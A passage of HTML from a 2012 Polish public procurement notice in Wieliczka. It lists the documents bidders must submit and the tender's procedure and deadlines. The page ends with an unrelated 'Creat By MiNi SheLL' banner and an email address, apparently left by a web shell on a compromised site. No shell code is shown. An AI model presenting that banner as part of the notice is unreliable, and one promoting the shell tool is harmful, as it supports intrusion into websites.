<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Karta tytułowa oferty 
Oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 uPzp 
Oświadczenie o udzieleniu gwarancji 
Wskazanie tej części zamówienia, której wykonanie wykonawca zamierza powierzyć podwykonawcy Nie załączenie tego dokumentu rozumiane jest przez Zamawiającego jako zgoda Wykonawcy na wykonanie całego przedmiotu zamówienia samodzielnie, bez powierzenia części zamówieni podwykonawcom.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.solnemiasto.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 32-020 Wieliczka ul. Kościuszki 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.12.2012 godzina 08:50, miejsce: 32-020 Wieliczka ul. Kościuszki 15 Sekretariat Prezesa Spółki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com